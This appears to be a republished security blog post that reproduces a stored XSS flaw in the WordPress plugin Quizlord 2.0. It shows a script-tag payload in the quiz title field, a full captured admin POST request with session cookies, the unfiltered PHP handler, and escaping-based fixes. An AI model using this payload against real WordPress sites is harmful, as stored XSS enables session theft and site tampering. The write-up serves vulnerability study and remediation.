
[vulnerability recurrence] WordPress plug-in Quizlord 2.0 XSS vulnerability recurrence and analysis

2025-01-15 update, from SLTechnology News&Howtos (shulou), Network Security


Shulou(Shulou.com)06/01 Report--

Years later, taking advantage of this gap when there is not much need to do security testing on systems, I am learning Python on the side and reproducing and analyzing some simple vulnerabilities.

-- from Lyricbao

0x00 Reproduction environment

phpstudy, WordPress version 4.4, Quizlord version 2.0

It seems that most of the vulnerabilities in WordPress are due to security problems with its plug-ins.

0x01 Steps

Use phpstudy to build the environment, install WordPress, then log in to the admin backend and download the Quizlord plug-in, version 2.0.

Once everything is ready, we can look at how to trigger the XSS.

3) At the title type: poc "><script>alert(1)</script>, then fill the remaining fields and click Save.

-- from exploit-db

XSS injection point: title

Request packet:

POST /wp4.4/wordpress/wp-admin/admin.php HTTP/1.1
Host: localhost
Content-Length: 184
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/wp4.4/wordpress/wp-admin/admin.php?page=quizlord
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: wordpress_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7C43a2436e074320bb113475ff8e44222065a4454e602d990d36639085856f0dd3; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_886edae3e5f5a7a13e41eff06328019c=admin%7C1550369766%7C3jD0iLwbcUNXjhlOr5O8IF6NjPACdraiCJZNLJhvCOW%7Cf23acf621ce28dbfc8f0baf9abe31370d3fc5674ca575a4ba1029832ca552c62; wp-settings-time-1=1550197219; pgv_pvi=4214545408; Phpstorm-c3dafaf3=cd60577d-e9ad-4825-b2e4-7a109a7e2faf; PHPSESSID=8v8jf1s93dprjgq4bpo29ldsq7
Connection: close

action=ql_insert&title=%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=1&time=0&numbtype=numerical&numbmark=1&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

The result is, of course, that the alert fires. The code applies no filtering at all, so this is a stored XSS.

0x02 Vulnerability analysis

Knowing that it works is not enough; we also need to know why. Let's look at where in the flow the problem occurs.

Go to the Quizlord plug-in directory, find quizlord.php, and open

The problem is that the title received by this function is written directly into the database without any filtering or escaping.

function ql_insert_quiz_data() {
    global $wpdb;
    if (!empty($_POST['title'])) {
        // Every field is taken from the request as-is; the title is the stored XSS sink.
        $ql_title       = $_POST['title'];
        $ql_description = $_POST['description'];
        $ql_time        = $_POST['time'];
        $ql_rightcolor  = "#" . $_POST['rightcolor'];
        $ql_wrongcolor  = "#" . $_POST['wrongcolor'];
        $ql_numbtype    = $_POST['numbtype'];
        $ql_numbmark    = $_POST['numbmark'];
        $ql_showtype    = $_POST['showtype'];
        $ql_random      = isset($_POST['random']) ? 1 : 0;
        $ql_skip        = isset($_POST['skip']) ? 1 : 0;
        $ql_resume      = isset($_POST['resume']) ? 1 : 0;
        $ql_backbtn     = isset($_POST['backbtn']) ? 1 : 0;
        $ql_autoload    = isset($_POST['autoload']) ? 1 : 0;
        $ql_checkcnt    = isset($_POST['checkcnt']) ? 1 : 0;
        // Written straight into the database with no escaping.
        $wpdb->insert($wpdb->prefix . 'ql_quizzes', array(
            'name'           => $ql_title,
            'description'    => $ql_description,
            'time'           => $ql_time,
            'right_color'    => $ql_rightcolor,
            'wrong_color'    => $ql_wrongcolor,
            'numbering_type' => $ql_numbtype,
            'numbering_mark' => $ql_numbmark,
            'show_type'      => $ql_showtype,
            'random'         => $ql_random,
            'skip'           => $ql_skip,
            'resume'         => $ql_resume,
            'autoload'       => $ql_autoload,
            'back_button'    => $ql_backbtn,
            'check_continue' => $ql_checkcnt
        ));
    }
    wp_redirect($_SERVER['HTTP_REFERER']);
    exit();
}
add_action('admin_action_ql_insert', 'ql_insert_quiz_data');

0x03 Vulnerability PoC

To be written

0x04 Vulnerability fix

Use the htmlentities() function to convert HTML special characters into entities.

My first thought was: since the payload has already been inserted into the database, why not escape at the output location instead?

So navigate to the output code and modify it to:

The output is then rendered as plain text, and the XSS can no longer be triggered.

If you prefer to escape at the input point, locate the input assignment and change it to $ql_title = htmlentities($_POST['title']);

In this case, it is best to escape at both the input and the output point, which gives a much stronger guarantee.
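As an added example (not the Quizlord plugin's own code), here is the insert handler shown above rewritten to follow that two-sided advice: the title and other free-text fields are cleaned on the way into the database, and a rendering helper escapes them again on the way out. It assumes it runs inside WordPress (for $wpdb, wp_redirect() and add_action()); the helper names ql_clean_input(), ql_escape_output(), ql_clean_hex_color() and ql_render_quiz_title() are chosen for this example, and sanitize_text_field() is the WordPress core function used on the input side instead of the article's htmlentities() for the reason given in the comments.

```php
<?php
// Added example, not the Quizlord plugin's own code: the insert handler from the
// article rewritten so the title is cleaned on input and escaped again on output.
// Assumes it runs inside WordPress (for $wpdb, wp_redirect() and add_action());
// ql_clean_input(), ql_escape_output(), ql_clean_hex_color() and
// ql_render_quiz_title() are names chosen for this example.

// Input side. Stripping markup here instead of calling htmlentities() (the
// article's input-side fix) avoids storing entities that the output escaping
// below would encode a second time, which would display "&lt;b&gt;" instead of "<b>".
function ql_clean_input( $value ) {
    $value = (string) $value;
    if ( function_exists( 'sanitize_text_field' ) ) {
        // WordPress core: strips tags, removes line breaks and stray octets, trims.
        return sanitize_text_field( $value );
    }
    // Plain-PHP fallback so this file also runs outside WordPress.
    return trim( strip_tags( $value ) );
}

// Output side: entity-encode at the moment the value is placed into HTML, as the
// article does. ENT_QUOTES also converts " and ', so the result is safe inside
// attribute values, not only between tags.
function ql_escape_output( $value ) {
    return htmlentities( (string) $value, ENT_QUOTES, 'UTF-8' );
}

// Colour fields are concatenated after "#", so keep at most six hex digits.
function ql_clean_hex_color( $value ) {
    return '#' . substr( preg_replace( '/[^0-9A-Fa-f]/', '', (string) $value ), 0, 6 );
}

function ql_insert_quiz_data_fixed() {
    global $wpdb;
    if ( ! empty( $_POST['title'] ) ) {
        $ql_title       = ql_clean_input( $_POST['title'] );
        $ql_description = ql_clean_input( $_POST['description'] ?? '' );
        $ql_time        = (int) ( $_POST['time'] ?? 0 );
        $ql_rightcolor  = ql_clean_hex_color( $_POST['rightcolor'] ?? '' );
        $ql_wrongcolor  = ql_clean_hex_color( $_POST['wrongcolor'] ?? '' );
        $ql_numbtype    = ql_clean_input( $_POST['numbtype'] ?? '' );
        $ql_numbmark    = ql_clean_input( $_POST['numbmark'] ?? '' );
        $ql_showtype    = ql_clean_input( $_POST['showtype'] ?? '' );
        // Checkbox fields were never a sink: they only ever become 1 or 0.
        $ql_random   = isset( $_POST['random'] ) ? 1 : 0;
        $ql_skip     = isset( $_POST['skip'] ) ? 1 : 0;
        $ql_resume   = isset( $_POST['resume'] ) ? 1 : 0;
        $ql_backbtn  = isset( $_POST['backbtn'] ) ? 1 : 0;
        $ql_autoload = isset( $_POST['autoload'] ) ? 1 : 0;
        $ql_checkcnt = isset( $_POST['checkcnt'] ) ? 1 : 0;
        // $wpdb->insert() parameterises its values, so SQL was never the issue here;
        // the problem was purely what those values contained.
        $wpdb->insert( $wpdb->prefix . 'ql_quizzes', array(
            'name'           => $ql_title,
            'description'    => $ql_description,
            'time'           => $ql_time,
            'right_color'    => $ql_rightcolor,
            'wrong_color'    => $ql_wrongcolor,
            'numbering_type' => $ql_numbtype,
            'numbering_mark' => $ql_numbmark,
            'show_type'      => $ql_showtype,
            'random'         => $ql_random,
            'skip'           => $ql_skip,
            'resume'         => $ql_resume,
            'autoload'       => $ql_autoload,
            'back_button'    => $ql_backbtn,
            'check_continue' => $ql_checkcnt,
        ) );
    }
    wp_redirect( $_SERVER['HTTP_REFERER'] );
    exit();
}

// Rendering helper: every value read back from the table goes through the escaper.
function ql_render_quiz_title( $quiz_name ) {
    return '<h2 class="ql-title">' . ql_escape_output( $quiz_name ) . '</h2>';
}

if ( function_exists( 'add_action' ) ) {
    add_action( 'admin_action_ql_insert', 'ql_insert_quiz_data_fixed' );
}

// Stand-alone check, run only from the command line without WordPress loaded.
// The payload is the one from the exploit-db step above (constructed input).
if ( PHP_SAPI === 'cli' && ! defined( 'ABSPATH' ) ) {
    $payload = 'poc "><script>alert(1)</script>';
    echo "stored as  : ", ql_clean_input( $payload ), "\n";
    echo "rendered as: ", ql_render_quiz_title( $payload ), "\n";
}
```

Running the file with php from a shell prints the cleaned value that would reach the database and the escaped markup that would reach the browser. The reason the input side strips rather than entity-encodes is worth keeping in mind when applying the article's "both points" advice: if htmlentities() is used at input and again at output, a stored "&lt;" is re-encoded to "&amp;lt;" and users see literal entity text in their quiz titles. The output-side escape is the one that must never be skipped, since it also protects rows that reached the table through some other path.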

0x05 References

https://www.exploit-db.com/exploits/45307 - details of the vulnerability and how to reproduce it.

A Chinese write-up of the same vulnerability: https://www.freebuf.com/vuls/189814.html
